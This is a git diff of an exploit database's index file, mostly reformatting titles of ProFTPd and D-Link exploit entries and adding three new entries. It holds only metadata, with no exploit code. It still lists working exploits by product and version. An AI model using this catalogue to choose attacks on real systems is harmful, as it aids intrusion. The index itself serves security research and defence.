diff --git a/files.csv b/files.csv
index de44bb11a..48593d927 100644
--- a/files.csv
+++ b/files.csv
@@ -34,8 +34,8 @@ id,file,description,date,author,platform,type,port
 236,platforms/linux/dos/236.sh,"RedHat 6.1/6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0
 238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0
 240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0
-241,platforms/linux/dos/241.c,"ProFTPd 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21
-244,platforms/linux/dos/244.java,"ProFTPd 1.2.0pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21
+241,platforms/linux/dos/241.c,"ProFTPd 1.2.0 rc2 - Memory Leakage Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21
+244,platforms/linux/dos/244.java,"ProFTPd 1.2.0 pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21
 251,platforms/linux/dos/251.c,"APC UPS 3.7.2 - 'apcupsd' Local Denial of Service",2001-01-15,"the itch",linux,dos,0
 262,platforms/hardware/dos/262.pl,"Cisco Multiple Products - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0
 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service",2001-05-07,honoriak,novell,dos,0
@@ -436,7 +436,7 @@ id,file,description,date,author,platform,type,port
 2916,platforms/windows/dos/2916.php,"Golden FTP server 1.92 - (USER/PASS) Heap Overflow (PoC)",2006-12-11,rgod,windows,dos,0
 2922,platforms/windows/dos/2922.txt,"Microsoft Word Document - Malformed Pointer (PoC)",2006-12-12,DiscoJonny,windows,dos,0
 2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 - (LIST/NLST) Denial of Service",2006-12-13,shinnai,windows,dos,0
-2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - (mod_ctrls support) Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0
+2928,platforms/linux/dos/2928.py,"ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC)",2006-12-13,"Core Security",linux,dos,0
 2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 - (DLL-load Hijacking) Code Execution (PoC)",2006-12-14,"Aviv Raff",windows,dos,0
 2934,platforms/windows/dos/2934.php,"Sambar FTP Server 6.4 - (SIZE) Remote Denial of Service",2006-12-15,rgod,windows,dos,0
 2935,platforms/windows/dos/2935.sh,"Microsoft Windows Media Player 9/10 - '.mid' Denial of Service",2006-12-15,sehato,windows,dos,0
@@ -1885,7 +1885,7 @@ id,file,description,date,author,platform,type,port
 16108,platforms/multiple/dos/16108.txt,"VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0
 16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Skinfile (Denial of Service)",2011-02-06,badc0re,windows,dos,0
 16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0
-16129,platforms/linux/dos/16129.txt,"ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0
+16129,platforms/linux/dos/16129.txt,"ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0
 16166,platforms/windows/dos/16166.py,"Microsoft Windows Server 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0
 16150,platforms/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service",2011-02-10,"Houssam Sahli",windows,dos,0
 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0
@@ -2480,7 +2480,7 @@ id,file,description,date,author,platform,type,port
 20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x - Firewall Denial of Service",2001-01-08,Nsfocus,sco,dos,0
 20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition - Denial of Service",2001-01-10,"Murat - 2",multiple,dos,0
 20535,platforms/linux/dos/20535.txt,"(Linux Kernel) ReiserFS 3.5.28 - Potential Code Execution / Denial of Service",2001-01-09,"Marc Lehmann",linux,dos,0
-20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - SIZE Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0
+20536,platforms/linux/dos/20536.java,"ProFTPd 1.2 - 'SIZE' Remote Denial of Service",2000-12-20,JeT-Li,linux,dos,0
 20705,platforms/multiple/dos/20705.py,"SAP NetWeaver Dispatcher 7.0 ehp1/2 - Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0
 20552,platforms/windows/dos/20552.html,"Microsoft Internet Explorer 4 / Outlook 2000/5.5 - 'MSHTML.dll' Crash",2001-01-15,"Thor Larholm",windows,dos,0
 20558,platforms/multiple/dos/20558.txt,"Apache 1.2 - Denial of Service",1997-12-30,"Michal Zalewski",multiple,dos,0
@@ -2744,7 +2744,7 @@ id,file,description,date,author,platform,type,port
 22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Request Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0
 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
 22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0
-22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - STAT Command Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
+22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - 'STAT' Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
 22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0
 22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0
 22105,platforms/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",linux,dos,0
@@ -5781,7 +5781,7 @@ id,file,description,date,author,platform,type,port
 381,platforms/windows/local/381.c,"RhinoSoft Serv-U FTP Server 3.x < 5.x - Privilege Escalation",2004-08-08,"Andrés Acunha",windows,local,0
 388,platforms/windows/local/388.c,"OllyDbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0
 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow",2004-08-13,anonymous,linux,local,0
-394,platforms/linux/local/394.c,"ProFTPd - (ftpdctl) Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0
+394,platforms/linux/local/394.c,"ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit",2004-08-13,pi3,linux,local,0
 395,platforms/windows/local/395.c,"AOL Instant Messenger AIM - 'Away' Message Local Exploit",2004-08-14,mandragore,windows,local,0
 396,platforms/bsd/local/396.c,"OpenBSD ftp - Exploit",2002-01-01,Teso,bsd,local,0
 401,platforms/windows/local/401.c,"IPSwitch IMail Server 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0
@@ -6066,8 +6066,8 @@ id,file,description,date,author,platform,type,port
 3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation",2007-01-29,"Andres Tarasco",windows,local,0
 3260,platforms/windows/local/3260.txt,"Microsoft Word 2000 - Unspecified Code Execution",2007-02-03,xCuter,windows,local,0
 3273,platforms/tru64/local/3273.ksh,"HP Tru64 Alpha OSF1 5.1 - (ps) Information Leak Exploit",2007-02-06,bunker,tru64,local,0
-3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0
-3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0
+3330,platforms/linux/local/3330.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (1)",2007-02-18,Revenge,linux,local,0
+3333,platforms/linux/local/3333.pl,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (2)",2007-02-19,Revenge,linux,local,0
 3342,platforms/windows/local/3342.c,"News Rover 12.1 Rev 1 - Remote Stack Overflow (1)",2007-02-20,Marsu,windows,local,0
 3349,platforms/windows/local/3349.c,"News Bin Pro 5.33 - '.nbi' Local Buffer Overflow",2007-02-21,Marsu,windows,local,0
 3356,platforms/linux/local/3356.sh,"Nortel SSL VPN Linux Client 6.0.3 - Privilege Escalation",2007-02-21,"Jon Hart",linux,local,0
@@ -6113,7 +6113,7 @@ id,file,description,date,author,platform,type,port
 3692,platforms/windows/local/3692.c,"IrfanView 3.99 - '.ani' Local Buffer Overflow (2)",2007-04-09,"Breno Silva Pinto",windows,local,0
 3695,platforms/windows/local/3695.c,"Microsoft Windows - Animated Cursor '.ani' Local Overflow",2007-04-09,"Breno Silva Pinto",windows,local,0
 3727,platforms/windows/local/3727.c,"VCDGear 3.56 Build 050213 - (FILE) Local Code Execution",2007-04-13,InTeL,windows,local,0
-3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - (mod_ctrls) Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0
+3730,platforms/linux/local/3730.txt,"ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' Local Overflow (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0
 3755,platforms/windows/local/3755.c,"Microsoft Windows - GDI Privilege Escalation (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0
 3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 - Local Format String",2007-04-17,jamikazu,windows,local,0
 3772,platforms/windows/local/3772.c,"PhotoFiltre Studio 8.1.1 - '.tif' Local Buffer Overflow",2007-04-21,Marsu,windows,local,0
@@ -6577,7 +6577,7 @@ id,file,description,date,author,platform,type,port
 10018,platforms/linux/local/10018.sh,"Linux Kernel 2.6.32 - 'pipe.c' Privilege Escalation (4)",2009-11-12,"Earl Chew",linux,local,0
 10038,platforms/linux/local/10038.txt,"proc File - Descriptors Directory Permissions Bypass",2009-10-23,"Pavel Machek",linux,local,0
 10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant (PoC)",2009-10-23,Dr_IDE,windows,local,0
-10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE)",2009-10-12,"Michael Domberg",unix,local,0
+10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow",2009-10-12,"Michael Domberg",unix,local,0
 10060,platforms/linux/local/10060.sh,"Geany .18 - Local File Overwrite",2009-10-06,"Jeremy Brown",linux,local,0
 10072,platforms/multiple/local/10072.c,"Multiple Vendor - TLS Protocol Session Renegotiation Security",2009-11-12,"Marsh Ray",multiple,local,0
 10076,platforms/osx/local/10076.c,"VMware Fusion 2.0.5 - vmx86 kext Kernel Privilege Escalation",2009-10-02,mu-b,osx,local,0
@@ -9220,6 +9220,7 @@ id,file,description,date,author,platform,type,port
 42565,platforms/windows/local/42565.py,"Easy DVD Creator 2.5.11 - Buffer Overflow (SEH)",2017-08-26,tr0ubl3m4k3r,windows,local,0
 42567,platforms/windows/local/42567.py,"Easy WMV/ASF/ASX to DVD Burner 2.3.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
 42568,platforms/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
+42586,platforms/windows/local/42586.py,"Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH)",2017-08-28,"Kishan Sharma",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -9245,7 +9246,7 @@ id,file,description,date,author,platform,type,port
 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69
 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80
 42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String",2003-06-11,ThreaT,windows,remote,25
-43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21
+43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21
 45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Exploit",2003-06-23,Rave,windows,remote,80
 46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,linux,remote,25
 48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80
@@ -9766,7 +9767,7 @@ id,file,description,date,author,platform,type,port
 2809,platforms/windows/remote/2809.py,"Microsoft Windows - NetpManageIPCConnect - Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",windows,remote,445
 2821,platforms/windows/remote/2821.c,"XMPlay 3.3.0.4 - '.PLS' Local/Remote Buffer Overflow",2006-11-21,"Greg Linares",windows,remote,0
 2837,platforms/multiple/remote/2837.sql,"Oracle 9i/10g - (read/write/execute) Exploitation Suite",2006-11-23,"Marco Ivaldi",multiple,remote,0
-2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - (sreplace) Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21
+2856,platforms/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21
 2858,platforms/linux/remote/2858.c,"Evince Document Viewer - (DocumentMedia) Buffer Overflow",2006-11-28,K-sPecial,linux,remote,0
 2865,platforms/windows/remote/2865.rb,"3Com TFTP Service (3CTftpSvc) 2.0.1 - 'Long Transporting Mode' Overflow",2006-11-30,cthulhu,windows,remote,69
 2866,platforms/windows/remote/2866.html,"Acer LunchApp.APlunch - (ActiveX Control) Command Execution",2006-11-30,"Tan Chew Keong",windows,remote,0
@@ -9992,7 +9993,7 @@ id,file,description,date,author,platform,type,port
 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure",2007-08-17,Pravus,windows,remote,0
 4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - 'uacomx.ocx 2.0.1' Remote Buffer Overflow",2007-08-21,rgod,windows,remote,0
 4301,platforms/windows/remote/4301.cpp,"Mercury/32 Mail SMTPD 4.51 - SMTPD CRAM-MD5 Unauthenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25
-4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21
+4312,platforms/linux/remote/4312.c,"ProFTPd 1.x - 'mod_tls module' Remote Buffer Overflow",2007-08-24,netris,linux,remote,21
 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Unauthenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389
 4316,platforms/windows/remote/4316.cpp,"Mercury/32 Mail Server 3.32 < 4.51 - SMTP Unauthenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25
 4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow",2007-08-27,bannedit,linux,remote,0
@@ -11413,8 +11414,8 @@ id,file,description,date,author,platform,type,port
 16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 (Linux) - 'secure' Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
 16849,platforms/linux/remote/16849.rb,"MySQL yaSSL (Linux) - SSL Hello Message Buffer Overflow (Metasploit)",2010-05-09,Metasploit,linux,remote,0
 16850,platforms/linux/remote/16850.rb,"MySQL - yaSSL CertDecoder::GetName Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0
-16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
-16852,platforms/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - sreplace Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
+16851,platforms/linux/remote/16851.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
+16852,platforms/linux/remote/16852.rb,"ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Buffer Overflow (Metasploit)",2011-01-09,Metasploit,linux,remote,0
 16853,platforms/linux/remote/16853.rb,"Berlios GPSD - Format String (Metasploit)",2010-04-30,Metasploit,linux,remote,0
 16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0
 16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
@@ -11436,7 +11437,7 @@ id,file,description,date,author,platform,type,port
 16874,platforms/osx/remote/16874.rb,"Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit)",2010-10-09,Metasploit,osx,remote,0
 16875,platforms/osx/remote/16875.rb,"Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-04-05,Metasploit,osx,remote,0
 16876,platforms/osx_ppc/remote/16876.rb,"Samba 2.2.8 (OSX/PPC) - 'trans2open' Overflow (Metasploit)",2010-06-21,Metasploit,osx_ppc,remote,0
-16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
+16878,platforms/linux/remote/16878.rb,"ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit)",2010-12-02,Metasploit,linux,remote,0
 16880,platforms/bsd_x86/remote/16880.rb,"Samba 2.2.8 (*BSD x86) - 'trans2open' Overflow Exploit (Metasploit)",2010-06-17,Metasploit,bsd_x86,remote,0
 16887,platforms/linux/remote/16887.rb,"HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit)",2010-07-03,Metasploit,linux,remote,0
 16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)",2010-08-25,Metasploit,linux,remote,0
@@ -11631,7 +11632,7 @@ id,file,description,date,author,platform,type,port
 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,multiple,remote,0
 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200/4300 - Command Execution (Metasploit)",2011-11-30,Metasploit,hardware,remote,0
 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0
-18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0
+18181,platforms/freebsd/remote/18181.txt,"ftpd / ProFTPd (FreeBSD) - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0
 18182,platforms/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote,0
 18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0
 18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0
@@ -11871,7 +11872,7 @@ id,file,description,date,author,platform,type,port
 19494,platforms/windows/remote/19494.c,"NetcPlus SmartServer 3.5.1 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
 19495,platforms/windows/remote/19495.c,"Computalynx CMail 2.3 SP2/2.4 - SMTP Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
 19496,platforms/windows/remote/19496.c,"FuseWare FuseMail 2.7 - POP Mail Buffer Overflow",1999-09-13,UNYUN,windows,remote,0
-19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - snprintf Exploit",1999-09-17,"Tymm Twillman",linux,remote,0
+19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - 'snprintf' Remote Root Exploit",1999-09-17,"Tymm Twillman",linux,remote,0
 19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 - Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0
 19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
 19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4.0) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
@@ -13619,7 +13620,7 @@ id,file,description,date,author,platform,type,port
 24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote,0
 24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit (Metasploit)",2013-04-10,Metasploit,multiple,remote,0
 24947,platforms/linux/remote/24947.txt,"MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution",2013-04-08,agixid,linux,remote,0
-24956,platforms/hardware/remote/24956.rb,"D-Link DIR-645 / DIR-815 - diagnostic.php Command Execution (Metasploit)",2013-04-12,Metasploit,hardware,remote,0
+24956,platforms/hardware/remote/24956.rb,"D-Link DIR-645 / DIR-815 - 'diagnostic.php' Command Execution (Metasploit)",2013-04-12,Metasploit,hardware,remote,0
 24958,platforms/windows/remote/24958.py,"MinaliC WebServer 2.0.0 - Buffer Overflow",2013-04-15,superkojiman,windows,remote,0
 24961,platforms/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,windows,remote,0
 24963,platforms/multiple/remote/24963.rb,"SAP ConfigServlet - OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",multiple,remote,50000
@@ -13751,7 +13752,7 @@ id,file,description,date,author,platform,type,port
 25598,platforms/osx/remote/25598.txt,"Apple Mac OSX 10.x - BlueTooth Directory Traversal",2005-05-04,"Kevin Finisterre",osx,remote,0
 25600,platforms/windows/remote/25600.txt,"simplecam 1.2 - Directory Traversal",2005-05-04,"Donato Ferrante",windows,remote,0
 25608,platforms/hardware/remote/25608.rb,"Linksys WRT160N v2 - apply.cgi Remote Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
-25609,platforms/hardware/remote/25609.rb,"D-Link DIR615h - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
+25609,platforms/hardware/remote/25609.rb,"D-Link DIR-615H - OS Command Injection (Metasploit)",2013-05-21,Metasploit,hardware,remote,80
 25820,platforms/linux/remote/25820.txt,"Finjan SurfinGate 7.0 - ASCII File Extension File Filter Circumvention",2005-06-14,d.schroeter@gmx.de,linux,remote,0
 25822,platforms/windows/remote/25822.xml,"Adobe Acrobat 7.0 / Adobe Reader 7.0 - File Existence and Disclosure",2005-06-15,"Sverre H. Huseby",windows,remote,0
 25613,platforms/multiple/remote/25613.txt,"Oracle 9i/10g - Database Fine Grained Audit Logging Failure",2005-05-05,"Alexander Kornbrust",multiple,remote,0
@@ -15208,7 +15209,7 @@ id,file,description,date,author,platform,type,port
 36744,platforms/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow (Metasploit)",2015-04-13,Metasploit,windows,remote,0
 36756,platforms/windows/remote/36756.html,"Samsung iPOLiS - ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0
 36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 - Cross-Site Request Forgery",2012-02-13,MustLive,hardware,remote,0
-36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 - (mod_copy) Remote Command Execution",2015-04-21,R-73eN,linux,remote,0
+36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution",2015-04-21,R-73eN,linux,remote,0
 36808,platforms/windows/remote/36808.rb,"Adobe Flash Player - copyPixelsToByteArray Integer Overflow (Metasploit)",2015-04-21,Metasploit,windows,remote,0
 36809,platforms/php/remote/36809.rb,"WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80
 36810,platforms/php/remote/36810.rb,"WordPress Plugin N-Media Website Contact Form - Arbitrary File Upload (Metasploit)",2015-04-21,Metasploit,php,remote,80
@@ -15252,7 +15253,7 @@ id,file,description,date,author,platform,type,port
 37171,platforms/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution (Metasploit)",2015-06-01,Metasploit,hardware,remote,0
 37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",hardware,remote,0
 37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote,0
-37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'Mod_Copy' Command Execution (Metasploit)",2015-06-10,Metasploit,linux,remote,0
+37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)",2015-06-10,Metasploit,linux,remote,0
 37336,platforms/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",multiple,remote,0
 37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player - ShaderJob Buffer Overflow (Metasploit)",2015-06-24,Metasploit,multiple,remote,0
 37396,platforms/windows/remote/37396.txt,"XAMPP for Windows 1.7.7 - Multiple Cross-Site Scripting / SQL Injection",2012-06-13,Sangteamtham,windows,remote,0
@@ -15694,6 +15695,7 @@ id,file,description,date,author,platform,type,port
 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
 42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
+42587,platforms/hardware/remote/42587.rb,"QNAP Transcode Server - Command Execution (Metasploit)",2017-08-29,Metasploit,hardware,remote,9251
 42316,platforms/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote,0
 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
 42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
@@ -27589,7 +27591,7 @@ id,file,description,date,author,platform,type,port
 24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0
 24451,platforms/php/webapps/24451.txt,"ArrowChat 1.5.61 - Multiple Vulnerabilities",2013-02-05,kallimero,php,webapps,0
 24452,platforms/php/webapps/24452.txt,"AdaptCMS 2.0.4 - 'config.php' 'question' Parameter SQL Injection",2013-02-05,kallimero,php,webapps,0
-24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0
+24453,platforms/hardware/webapps/24453.txt,"D-Link DIR-600 / DIR-300 (Rev B) - Multiple Vulnerabilities",2013-02-05,m-1-k-3,hardware,webapps,0
 24454,platforms/php/webapps/24454.txt,"Free Monthly Websites 2.0 - Multiple Vulnerabilities",2013-02-05,X-Cisadane,php,webapps,0
